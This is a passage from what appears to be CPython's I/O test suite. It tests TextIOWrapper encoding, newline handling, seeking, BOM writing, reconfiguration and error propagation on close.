self.assertEqual(t.read(), "abc\n\ufffd\n") def test_encoding_errors_writing(self): # (1) default b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii") self.assertRaises(UnicodeError, t.write, "\xff") # (2) explicit strict b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="strict") self.assertRaises(UnicodeError, t.write, "\xff") # (3) ignore b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="ignore", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abcdef\n") # (4) replace b = self.BytesIO() t = self.TextIOWrapper(b, encoding="ascii", errors="replace", newline="\n") t.write("abc\xffdef\n") t.flush() self.assertEqual(b.getvalue(), b"abc?def\n") def test_newlines(self): input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ] tests = [ [ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ], [ '', input_lines ], [ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ], [ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ], [ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ], ] encodings = ( 'utf-8', 'latin-1', 'utf-16', 'utf-16-le', 'utf-16-be', 'utf-32', 'utf-32-le', 'utf-32-be', ) # Try a range of buffer sizes to test the case where \r is the last # character in TextIOWrapper._pending_line. 
for encoding in encodings: # XXX: str.encode() should return bytes data = bytes(''.join(input_lines).encode(encoding)) for do_reads in (False, True): for bufsize in range(1, 10): for newline, exp_lines in tests: bufio = self.BufferedReader(self.BytesIO(data), bufsize) textio = self.TextIOWrapper(bufio, newline=newline, encoding=encoding) if do_reads: got_lines = [] while True: c2 = textio.read(2) if c2 == '': break self.assertEqual(len(c2), 2) got_lines.append(c2 + textio.readline()) else: got_lines = list(textio) for got_line, exp_line in zip(got_lines, exp_lines): self.assertEqual(got_line, exp_line) self.assertEqual(len(got_lines), len(exp_lines)) def test_newlines_input(self): testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG" normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n") for newline, expected in [ (None, normalized.decode("ascii").splitlines(keepends=True)), ("", testdata.decode("ascii").splitlines(keepends=True)), ("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]), ("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]), ]: buf = self.BytesIO(testdata) txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) self.assertEqual(txt.readlines(), expected) txt.seek(0) self.assertEqual(txt.read(), "".join(expected)) def test_newlines_output(self): testdict = { "": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ", "\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ", "\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ", } tests = [(None, testdict[os.linesep])] + sorted(testdict.items()) for newline, expected in tests: buf = self.BytesIO() txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline) txt.write("AAA\nB") txt.write("BB\nCCC\n") txt.write("X\rY\r\nZ") txt.flush() self.assertEqual(buf.closed, False) self.assertEqual(buf.getvalue(), expected) def test_destructor(self): l = [] base = self.BytesIO class MyBytesIO(base): def close(self): 
l.append(self.getvalue()) base.close(self) b = MyBytesIO() t = self.TextIOWrapper(b, encoding="ascii") t.write("abc") del t support.gc_collect() self.assertEqual([b"abc"], l) def test_override_destructor(self): record = [] class MyTextIO(self.TextIOWrapper): def __del__(self): record.append(1) try: f = super().__del__ except AttributeError: pass else: f() def close(self): record.append(2) super().close() def flush(self): record.append(3) super().flush() b = self.BytesIO() t = MyTextIO(b, encoding="ascii") del t support.gc_collect() self.assertEqual(record, [1, 2, 3]) def test_error_through_destructor(self): # Test that the exception state is not modified by a destructor, # even if close() fails. rawio = self.CloseFailureIO() with support.catch_unraisable_exception() as cm: with self.assertRaises(AttributeError): self.TextIOWrapper(rawio).xyzzy if not IOBASE_EMITS_UNRAISABLE: self.assertIsNone(cm.unraisable) elif cm.unraisable is not None: self.assertEqual(cm.unraisable.exc_type, OSError) # Systematic tests of the text I/O API def test_basic_io(self): for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65): for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le": f = self.open(support.TESTFN, "w+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.write("abc"), 3) f.close() f = self.open(support.TESTFN, "r+", encoding=enc) f._CHUNK_SIZE = chunksize self.assertEqual(f.tell(), 0) self.assertEqual(f.read(), "abc") cookie = f.tell() self.assertEqual(f.seek(0), 0) self.assertEqual(f.read(None), "abc") f.seek(0) self.assertEqual(f.read(2), "ab") self.assertEqual(f.read(1), "c") self.assertEqual(f.read(1), "") self.assertEqual(f.read(), "") self.assertEqual(f.tell(), cookie) self.assertEqual(f.seek(0), 0) self.assertEqual(f.seek(0, 2), cookie) self.assertEqual(f.write("def"), 3) self.assertEqual(f.seek(cookie), cookie) self.assertEqual(f.read(), "def") if enc.startswith("utf"): self.multi_line_test(f, enc) f.close() def 
multi_line_test(self, f, enc): f.seek(0) f.truncate() sample = "s\xff\u0fff\uffff" wlines = [] for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000): chars = [] for i in range(size): chars.append(sample[i % len(sample)]) line = "".join(chars) + "\n" wlines.append((f.tell(), line)) f.write(line) f.seek(0) rlines = [] while True: pos = f.tell() line = f.readline() if not line: break rlines.append((pos, line)) self.assertEqual(rlines, wlines) def test_telling(self): f = self.open(support.TESTFN, "w+", encoding="utf-8") p0 = f.tell() f.write("\xff\n") p1 = f.tell() f.write("\xff\n") p2 = f.tell() f.seek(0) self.assertEqual(f.tell(), p0) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p1) self.assertEqual(f.readline(), "\xff\n") self.assertEqual(f.tell(), p2) f.seek(0) for line in f: self.assertEqual(line, "\xff\n") self.assertRaises(OSError, f.tell) self.assertEqual(f.tell(), p2) f.close() def test_seeking(self): chunk_size = _default_chunk_size() prefix_size = chunk_size - 2 u_prefix = "a" * prefix_size prefix = bytes(u_prefix.encode("utf-8")) self.assertEqual(len(u_prefix), len(prefix)) u_suffix = "\u8888\n" suffix = bytes(u_suffix.encode("utf-8")) line = prefix + suffix with self.open(support.TESTFN, "wb") as f: f.write(line*2) with self.open(support.TESTFN, "r", encoding="utf-8") as f: s = f.read(prefix_size) self.assertEqual(s, str(prefix, "ascii")) self.assertEqual(f.tell(), prefix_size) self.assertEqual(f.readline(), u_suffix) def test_seeking_too(self): # Regression test for a specific bug data = b'\xe0\xbf\xbf\n' with self.open(support.TESTFN, "wb") as f: f.write(data) with self.open(support.TESTFN, "r", encoding="utf-8") as f: f._CHUNK_SIZE # Just test that it exists f._CHUNK_SIZE = 2 f.readline() f.tell() def test_seek_and_tell(self): #Test seek/tell using the StatefulIncrementalDecoder. 
# Make test faster by doing smaller seeks CHUNK_SIZE = 128 def test_seek_and_tell_with_data(data, min_pos=0): """Tell/seek to various points within a data stream and ensure that the decoded data returned by read() is consistent.""" f = self.open(support.TESTFN, 'wb') f.write(data) f.close() f = self.open(support.TESTFN, encoding='test_decoder') f._CHUNK_SIZE = CHUNK_SIZE decoded = f.read() f.close() for i in range(min_pos, len(decoded) + 1): # seek positions for j in [1, 5, len(decoded) - i]: # read lengths f = self.open(support.TESTFN, encoding='test_decoder') self.assertEqual(f.read(i), decoded[:i]) cookie = f.tell() self.assertEqual(f.read(j), decoded[i:i + j]) f.seek(cookie) self.assertEqual(f.read(), decoded[i:]) f.close() # Enable the test decoder. StatefulIncrementalDecoder.codecEnabled = 1 # Run the tests. try: # Try each test case. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: test_seek_and_tell_with_data(input) # Position each test case so that it crosses a chunk boundary. for input, _, _ in StatefulIncrementalDecoderTest.test_cases: offset = CHUNK_SIZE - len(input)//2 prefix = b'.'*offset # Don't bother seeking into the prefix (takes too long). min_pos = offset*2 test_seek_and_tell_with_data(prefix + input, min_pos) # Ensure our test decoder won't interfere with subsequent tests. 
finally: StatefulIncrementalDecoder.codecEnabled = 0 def test_multibyte_seek_and_tell(self): f = self.open(support.TESTFN, "w", encoding="euc_jp") f.write("AB\n\u3046\u3048\n") f.close() f = self.open(support.TESTFN, "r", encoding="euc_jp") self.assertEqual(f.readline(), "AB\n") p0 = f.tell() self.assertEqual(f.readline(), "\u3046\u3048\n") p1 = f.tell() f.seek(p0) self.assertEqual(f.readline(), "\u3046\u3048\n") self.assertEqual(f.tell(), p1) f.close() def test_seek_with_encoder_state(self): f = self.open(support.TESTFN, "w", encoding="euc_jis_2004") f.write("\u00e6\u0300") p0 = f.tell() f.write("\u00e6") f.seek(p0) f.write("\u0300") f.close() f = self.open(support.TESTFN, "r", encoding="euc_jis_2004") self.assertEqual(f.readline(), "\u00e6\u0300\u0300") f.close() def test_encoded_writes(self): data = "1234567890" tests = ("utf-16", "utf-16-le", "utf-16-be", "utf-32", "utf-32-le", "utf-32-be") for encoding in tests: buf = self.BytesIO() f = self.TextIOWrapper(buf, encoding=encoding) # Check if the BOM is written only once (see issue1753). f.write(data) f.write(data) f.seek(0) self.assertEqual(f.read(), data * 2) f.seek(0) self.assertEqual(f.read(), data * 2) self.assertEqual(buf.getvalue(), (data * 2).encode(encoding)) def test_unreadable(self): class UnReadable(self.BytesIO): def readable(self): return False txt = self.TextIOWrapper(UnReadable()) self.assertRaises(OSError, txt.read) def test_read_one_by_one(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB")) reads = "" while True: c = txt.read(1) if not c: break reads += c self.assertEqual(reads, "AA\nBB") def test_readlines(self): txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC")) self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"]) txt.seek(0) self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"]) # read in amounts equal to TextIOWrapper._CHUNK_SIZE which is 128. 
    def test_read_by_chunk(self):
        # make sure "\r\n" straddles 128 char boundary.
        txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
        reads = ""
        while True:
            c = txt.read(128)
            if not c:
                break
            reads += c
        self.assertEqual(reads, "A"*127+"\nB")

    def test_writelines(self):
        l = ['ab', 'cd', 'ef']
        buf = self.BytesIO()
        txt = self.TextIOWrapper(buf)
        txt.writelines(l)
        txt.flush()
        self.assertEqual(buf.getvalue(), b'abcdef')

    def test_writelines_userlist(self):
        # writelines() must accept any iterable of str, not just list.
        l = UserList(['ab', 'cd', 'ef'])
        buf = self.BytesIO()
        txt = self.TextIOWrapper(buf)
        txt.writelines(l)
        txt.flush()
        self.assertEqual(buf.getvalue(), b'abcdef')

    def test_writelines_error(self):
        txt = self.TextIOWrapper(self.BytesIO())
        self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
        self.assertRaises(TypeError, txt.writelines, None)
        self.assertRaises(TypeError, txt.writelines, b'abc')

    def test_issue1395_1(self):
        # Issue #1395 regression family: reading self.testdata in various
        # granularities must always produce self.normalized.
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")

        # read one char at a time
        reads = ""
        while True:
            c = txt.read(1)
            if not c:
                break
            reads += c
        self.assertEqual(reads, self.normalized)

    def test_issue1395_2(self):
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        txt._CHUNK_SIZE = 4

        reads = ""
        while True:
            c = txt.read(4)
            if not c:
                break
            reads += c
        self.assertEqual(reads, self.normalized)

    def test_issue1395_3(self):
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        txt._CHUNK_SIZE = 4

        reads = txt.read(4)
        reads += txt.read(4)
        reads += txt.readline()
        reads += txt.readline()
        reads += txt.readline()
        self.assertEqual(reads, self.normalized)

    def test_issue1395_4(self):
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        txt._CHUNK_SIZE = 4

        reads = txt.read(4)
        reads += txt.read()
        self.assertEqual(reads, self.normalized)

    def test_issue1395_5(self):
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        txt._CHUNK_SIZE = 4

        reads = txt.read(4)
        pos = txt.tell()
        txt.seek(0)
        # seek back to the cookie taken mid-stream and keep reading.
        txt.seek(pos)
        self.assertEqual(txt.read(4), "BBB\n")

    def test_issue2282(self):
        buffer = self.BytesIO(self.testdata)
        txt = self.TextIOWrapper(buffer, encoding="ascii")

        # seekable() must be forwarded from the underlying buffer.
        self.assertEqual(buffer.seekable(), txt.seekable())

    def test_append_bom(self):
        # The BOM is not written again when appending to a non-empty file
        filename = support.TESTFN
        for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
            with self.open(filename, 'w', encoding=charset) as f:
                f.write('aaa')
                pos = f.tell()
            with self.open(filename, 'rb') as f:
                self.assertEqual(f.read(), 'aaa'.encode(charset))

            with self.open(filename, 'a', encoding=charset) as f:
                f.write('xxx')
            with self.open(filename, 'rb') as f:
                self.assertEqual(f.read(), 'aaaxxx'.encode(charset))

    def test_seek_bom(self):
        # Same test, but when seeking manually
        filename = support.TESTFN
        for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
            with self.open(filename, 'w', encoding=charset) as f:
                f.write('aaa')
                pos = f.tell()
            with self.open(filename, 'r+', encoding=charset) as f:
                f.seek(pos)
                f.write('zzz')
                f.seek(0)
                f.write('bbb')
            with self.open(filename, 'rb') as f:
                self.assertEqual(f.read(), 'bbbzzz'.encode(charset))

    def test_seek_append_bom(self):
        # Same test, but first seek to the start and then to the end
        filename = support.TESTFN
        for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
            with self.open(filename, 'w', encoding=charset) as f:
                f.write('aaa')
            with self.open(filename, 'a', encoding=charset) as f:
                f.seek(0)
                f.seek(0, self.SEEK_END)
                f.write('xxx')
            with self.open(filename, 'rb') as f:
                self.assertEqual(f.read(), 'aaaxxx'.encode(charset))

    def test_errors_property(self):
        with self.open(support.TESTFN, "w") as f:
            self.assertEqual(f.errors, "strict")
        with self.open(support.TESTFN, "w", errors="replace") as f:
            self.assertEqual(f.errors, "replace")

    @support.no_tracing
    def test_threads_write(self):
        # Issue6750: concurrent writes could duplicate data
        event = threading.Event()
        with self.open(support.TESTFN, "w", buffering=1) as f:
            def run(n):
                text = "Thread%03d\n" % n
                event.wait()
                f.write(text)
            threads = [threading.Thread(target=run, args=(x,))
                       for x in range(20)]
            with threading_helper.start_threads(threads, event.set):
                time.sleep(0.02)
        with self.open(support.TESTFN) as f:
            content = f.read()
            for n in range(20):
                # each thread's line appears exactly once -> no duplication
                self.assertEqual(content.count("Thread%03d\n" % n), 1)

    def test_flush_error_on_close(self):
        # Test that text file is closed despite failed flush
        # and that flush() is called before file closed.
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        closed = []
        def bad_flush():
            closed[:] = [txt.closed, txt.buffer.closed]
            raise OSError()
        txt.flush = bad_flush
        self.assertRaises(OSError, txt.close) # exception not swallowed
        self.assertTrue(txt.closed)
        self.assertTrue(txt.buffer.closed)
        self.assertTrue(closed)      # flush() called
        self.assertFalse(closed[0])  # flush() called before file closed
        self.assertFalse(closed[1])
        txt.flush = lambda: None  # break reference loop

    def test_close_error_on_close(self):
        buffer = self.BytesIO(self.testdata)
        def bad_flush():
            raise OSError('flush')
        def bad_close():
            raise OSError('close')
        buffer.close = bad_close
        txt = self.TextIOWrapper(buffer, encoding="ascii")
        txt.flush = bad_flush
        with self.assertRaises(OSError) as err: # exception not swallowed
            txt.close()
        # close() error wins; the earlier flush() error is chained as context.
        self.assertEqual(err.exception.args, ('close',))
        self.assertIsInstance(err.exception.__context__, OSError)
        self.assertEqual(err.exception.__context__.args, ('flush',))
        self.assertFalse(txt.closed)

        # Silence destructor error
        buffer.close = lambda: None
        txt.flush = lambda: None

    def test_nonnormalized_close_error_on_close(self):
        # Issue #21677
        buffer = self.BytesIO(self.testdata)
        def bad_flush():
            raise non_existing_flush
        def bad_close():
            raise non_existing_close
        buffer.close = bad_close
        txt = self.TextIOWrapper(buffer, encoding="ascii")
        txt.flush = bad_flush
        with self.assertRaises(NameError) as err: # exception not swallowed
            txt.close()
        self.assertIn('non_existing_close', str(err.exception))
        self.assertIsInstance(err.exception.__context__, NameError)
        self.assertIn('non_existing_flush', str(err.exception.__context__))
        self.assertFalse(txt.closed)

        # Silence destructor error
        buffer.close = lambda: None
        txt.flush = lambda: None

    def test_multi_close(self):
        # Repeated close() must be a no-op after the first call.
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        txt.close()
        txt.close()
        txt.close()
        self.assertRaises(ValueError, txt.flush)

    def test_unseekable(self):
        txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
        self.assertRaises(self.UnsupportedOperation, txt.tell)
        self.assertRaises(self.UnsupportedOperation, txt.seek, 0)

    def test_readonly_attributes(self):
        # .buffer is a read-only attribute on the wrapper.
        txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
        buf = self.BytesIO(self.testdata)
        with self.assertRaises(AttributeError):
            txt.buffer = buf

    def test_rawio(self):
        # Issue #12591: TextIOWrapper must work with raw I/O objects, so
        # that subprocess.Popen() can have the required unbuffered
        # semantics with universal_newlines=True.
        raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
        # Reads
        self.assertEqual(txt.read(4), 'abcd')
        self.assertEqual(txt.readline(), 'efghi\n')
        self.assertEqual(list(txt), ['jkl\n', 'opq\n'])

    def test_rawio_write_through(self):
        # Issue #12591: with write_through=True, writes don't need a flush
        raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
                                 write_through=True)
        txt.write('1')
        txt.write('23\n4')
        txt.write('5')
        self.assertEqual(b''.join(raw._write_stack), b'123\n45')

    def test_bufio_write_through(self):
        # Issue #21396: write_through=True doesn't force a flush()
        # on the underlying binary buffered object.
        # Record every flush()/write() on the buffered layer so we can
        # assert exactly which of them write_through triggers.
        flush_called, write_called = [], []
        class BufferedWriter(self.BufferedWriter):
            def flush(self, *args, **kwargs):
                flush_called.append(True)
                return super().flush(*args, **kwargs)
            def write(self, *args, **kwargs):
                write_called.append(True)
                return super().write(*args, **kwargs)

        rawio = self.BytesIO()
        data = b"a"
        bufio = BufferedWriter(rawio, len(data)*2)
        textio = self.TextIOWrapper(bufio, encoding='ascii',
                                    write_through=True)
        # write to the buffered io but don't overflow the buffer
        text = data.decode('ascii')
        textio.write(text)

        # buffer.flush is not called with write_through=True
        self.assertFalse(flush_called)
        # buffer.write *is* called with write_through=True
        self.assertTrue(write_called)
        self.assertEqual(rawio.getvalue(), b"") # no flush

        write_called = [] # reset
        textio.write(text * 10) # total content is larger than bufio buffer
        self.assertTrue(write_called)
        self.assertEqual(rawio.getvalue(), data * 11) # all flushed

    def test_reconfigure_write_through(self):
        raw = self.MockRawIO([])
        t = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
        t.write('1')
        t.reconfigure(write_through=True)  # implied flush
        self.assertEqual(t.write_through, True)
        self.assertEqual(b''.join(raw._write_stack), b'1')
        t.write('23')
        self.assertEqual(b''.join(raw._write_stack), b'123')
        t.reconfigure(write_through=False)
        self.assertEqual(t.write_through, False)
        t.write('45')
        t.flush()
        self.assertEqual(b''.join(raw._write_stack), b'12345')
        # Keeping default value
        t.reconfigure()
        t.reconfigure(write_through=None)
        self.assertEqual(t.write_through, False)
        t.reconfigure(write_through=True)
        t.reconfigure()
        t.reconfigure(write_through=None)
        self.assertEqual(t.write_through, True)

    def test_read_nonbytes(self):
        # Issue #17106
        # Crash when underlying read() returns non-bytes
        t = self.TextIOWrapper(self.StringIO('a'))
        self.assertRaises(TypeError, t.read, 1)
        t = self.TextIOWrapper(self.StringIO('a'))
        self.assertRaises(TypeError, t.readline)
        t = self.TextIOWrapper(self.StringIO('a'))
        self.assertRaises(TypeError, t.read)

    def test_illegal_encoder(self):
        # Issue 31271: Calling write() while the return value of encoder's
        # encode() is invalid shouldn't cause an assertion failure.
        rot13 = codecs.lookup("rot13")
        with support.swap_attr(rot13, '_is_text_encoding', True):
            t = io.TextIOWrapper(io.BytesIO(b'foo'), encoding="rot13")
        self.assertRaises(TypeError, t.write, 'bar')

    def test_illegal_decoder(self):
        # Issue #17106
        # Bypass the early encoding check added in issue 20404
        def _make_illegal_wrapper():
            # Temporarily mark quopri as a text encoding so TextIOWrapper
            # accepts it; restore the flag even on failure.
            quopri = codecs.lookup("quopri")
            quopri._is_text_encoding = True
            try:
                t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
                                       newline='\n', encoding="quopri")
            finally:
                quopri._is_text_encoding = False
            return t
        # Crash when decoder returns non-string
        t = _make_illegal_wrapper()
        self.assertRaises(TypeError, t.read, 1)
        t = _make_illegal_wrapper()
        self.assertRaises(TypeError, t.readline)
        t = _make_illegal_wrapper()
        self.assertRaises(TypeError, t.read)

        # Issue 31243: calling read() while the return value of decoder's
        # getstate() is invalid should neither crash the interpreter nor
        # raise a SystemError.
        def _make_very_illegal_wrapper(getstate_ret_val):
            class BadDecoder:
                def getstate(self):
                    return getstate_ret_val
            def _get_bad_decoder(dummy):
                return BadDecoder()
            quopri = codecs.lookup("quopri")
            with support.swap_attr(quopri, 'incrementaldecoder',
                                   _get_bad_decoder):
                return _make_illegal_wrapper()
        t = _make_very_illegal_wrapper(42)
        self.assertRaises(TypeError, t.read, 42)
        t = _make_very_illegal_wrapper(())
        self.assertRaises(TypeError, t.read, 42)
        t = _make_very_illegal_wrapper((1, 2))
        self.assertRaises(TypeError, t.read, 42)

    def _check_create_at_shutdown(self, **kwargs):
        # Issue #20037: creating a TextIOWrapper at shutdown
        # shouldn't crash the interpreter.
        # Run the snippet in a subprocess: the wrapper is created inside
        # C.__del__, which fires during interpreter shutdown.
        iomod = self.io.__name__
        code = """if 1:
            import codecs
            import {iomod} as io

            # Avoid looking up codecs at shutdown
            codecs.lookup('utf-8')

            class C:
                def __init__(self):
                    self.buf = io.BytesIO()
                def __del__(self):
                    io.TextIOWrapper(self.buf, **{kwargs})
                    print("ok")
            c = C()
            """.format(iomod=iomod, kwargs=kwargs)
        return assert_python_ok("-c", code)

    def test_create_at_shutdown_without_encoding(self):
        rc, out, err = self._check_create_at_shutdown()
        if err:
            # Can error out with a RuntimeError if the module state
            # isn't found.
            self.assertIn(self.shutdown_error, err.decode())
        else:
            self.assertEqual("ok", out.decode().strip())

    def test_create_at_shutdown_with_encoding(self):
        rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
                                                      errors='strict')
        self.assertFalse(err)
        self.assertEqual("ok", out.decode().strip())

    def test_read_byteslike(self):
        r = MemviewBytesIO(b'Just some random string\n')
        t = self.TextIOWrapper(r, 'utf-8')

        # TextIOwrapper will not read the full string, because
        # we truncate it to a multiple of the native int size
        # so that we can construct a more complex memoryview.
        bytes_val = _to_memoryview(r.getvalue()).tobytes()

        self.assertEqual(t.read(200), bytes_val.decode('utf-8'))

    def test_issue22849(self):
        # Issue #22849: constructing a TextIOWrapper around an object with
        # no tell() must not crash; once tell() exists, construction works.
        class F(object):
            def readable(self): return True
            def writable(self): return True
            def seekable(self): return True

        for i in range(10):
            try:
                self.TextIOWrapper(F(), encoding='utf-8')
            except Exception:
                pass

        F.tell = lambda x: 0
        t = self.TextIOWrapper(F(), encoding='utf-8')

    def test_reconfigure_encoding_read(self):
        # latin1 -> utf8
        # (latin1 can decode utf-8 encoded string)
        data = 'abc\xe9\n'.encode('latin1') + 'd\xe9f\n'.encode('utf8')
        raw = self.BytesIO(data)
        txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
        self.assertEqual(txt.readline(), 'abc\xe9\n')
        # Changing the encoding or newline after reading has started is
        # not supported.
        with self.assertRaises(self.UnsupportedOperation):
            txt.reconfigure(encoding='utf-8')
        with self.assertRaises(self.UnsupportedOperation):
            txt.reconfigure(newline=None)

    def test_reconfigure_write_fromascii(self):
        # ascii has a specific encodefunc in the C implementation,
        # but utf-8-sig has not. Make sure that we get rid of the
        # cached encodefunc when we switch encoders.
        raw = self.BytesIO()
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
        txt.write('foo\n')
        txt.reconfigure(encoding='utf-8-sig')
        txt.write('\xe9\n')
        txt.flush()
        # '\xe9' must come out UTF-8 encoded, with no BOM mid-stream.
        self.assertEqual(raw.getvalue(), b'foo\n\xc3\xa9\n')

    def test_reconfigure_write(self):
        # latin -> utf8
        raw = self.BytesIO()
        txt = self.TextIOWrapper(raw, encoding='latin1', newline='\n')
        txt.write('abc\xe9\n')
        txt.reconfigure(encoding='utf-8')
        # reconfigure() flushes the pending latin1 data first.
        self.assertEqual(raw.getvalue(), b'abc\xe9\n')
        txt.write('d\xe9f\n')
        txt.flush()
        self.assertEqual(raw.getvalue(), b'abc\xe9\nd\xc3\xa9f\n')

        # ascii -> utf-8-sig: ensure that no BOM is written in the middle of
        # the file
        raw = self.BytesIO()
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
        txt.write('abc\n')
        txt.reconfigure(encoding='utf-8-sig')
        txt.write('d\xe9f\n')
        txt.flush()
        self.assertEqual(raw.getvalue(), b'abc\nd\xc3\xa9f\n')

    def test_reconfigure_write_non_seekable(self):
        raw = self.BytesIO()
        raw.seekable = lambda: False
        raw.seek = None
        txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
        txt.write('abc\n')
        txt.reconfigure(encoding='utf-8-sig')
        txt.write('d\xe9f\n')
        txt.flush()

        # If the raw stream is not seekable, there'll be a BOM
        self.assertEqual(raw.getvalue(), b'abc\n\xef\xbb\xbfd\xc3\xa9f\n')

    def test_reconfigure_defaults(self):
        txt = self.TextIOWrapper(self.BytesIO(), 'ascii', 'replace', '\n')
        # Passing None keeps the current value for that parameter.
        txt.reconfigure(encoding=None)
        self.assertEqual(txt.encoding, 'ascii')
        self.assertEqual(txt.errors, 'replace')
        txt.write('LF\n')

        txt.reconfigure(newline='\r\n')
        self.assertEqual(txt.encoding, 'ascii')
        self.assertEqual(txt.errors, 'replace')

        txt.reconfigure(errors='ignore')
        self.assertEqual(txt.encoding, 'ascii')
        self.assertEqual(txt.errors, 'ignore')
        txt.write('CRLF\n')

        # Changing the encoding resets errors back to 'strict'.
        txt.reconfigure(encoding='utf-8', newline=None)
        self.assertEqual(txt.errors, 'strict')
        txt.seek(0)
        self.assertEqual(txt.read(), 'LF\nCRLF\n')

        self.assertEqual(txt.detach().getvalue(), b'LF\nCRLF\r\n')

    def test_reconfigure_newline(self):
        raw = self.BytesIO(b'CR\rEOF')
        # Reading: each reconfigure(newline=...) changes how the next
        # readline() recognizes and translates line endings.
        txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
        txt.reconfigure(newline=None)
        self.assertEqual(txt.readline(), 'CR\n')
        raw = self.BytesIO(b'CR\rEOF')
        txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
        txt.reconfigure(newline='')
        self.assertEqual(txt.readline(), 'CR\r')
        raw = self.BytesIO(b'CR\rLF\nEOF')
        txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
        txt.reconfigure(newline='\n')
        self.assertEqual(txt.readline(), 'CR\rLF\n')
        raw = self.BytesIO(b'LF\nCR\rEOF')
        txt = self.TextIOWrapper(raw, 'ascii', newline='\n')
        txt.reconfigure(newline='\r')
        self.assertEqual(txt.readline(), 'LF\nCR\r')
        raw = self.BytesIO(b'CR\rCRLF\r\nEOF')
        txt = self.TextIOWrapper(raw, 'ascii', newline='\r')
        txt.reconfigure(newline='\r\n')
        self.assertEqual(txt.readline(), 'CR\rCRLF\r\n')

        # Writing: '\n' in written text is translated per the newline
        # setting in effect at the time of each write().
        txt = self.TextIOWrapper(self.BytesIO(), 'ascii', newline='\r')
        txt.reconfigure(newline=None)
        txt.write('linesep\n')
        txt.reconfigure(newline='')
        txt.write('LF\n')
        txt.reconfigure(newline='\n')
        txt.write('LF\n')
        txt.reconfigure(newline='\r')
        txt.write('CR\n')
        txt.reconfigure(newline='\r\n')
        txt.write('CRLF\n')
        expected = 'linesep' + os.linesep + 'LF\nLF\nCR\rCRLF\r\n'
        self.assertEqual(txt.detach().getvalue().decode('ascii'), expected)

    def test_issue25862(self):
        # Assertion failures occurred in tell() after read() and write().
        t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
        t.read(1)
        t.read()
        t.tell()
        t = self.TextIOWrapper(self.BytesIO(b'test'), encoding='ascii')
        t.read(1)
        t.write('x')
        t.tell()


class MemviewBytesIO(io.BytesIO):
    '''A BytesIO object whose read method returns memoryviews
       rather than bytes'''

    def read1(self, len_):
        return _to_memoryview(super().read1(len_))

    def read(self, len_):
        return _to_memoryview(super().read(len_))

def _to_memoryview(buf):
    '''Convert bytes-object *buf* to a non-trivial memoryview'''
    # Truncate to a multiple of the int itemsize so the bytes can be
    # viewed as an array of native ints (a non-trivial, strided view).
    arr = array.array('i')
    idx = len(buf) - len(buf) % arr.itemsize
    arr.frombytes(buf[:idx])
    return memoryview(arr)


class CTextIOWrapperTest(TextIOWrapperTest):
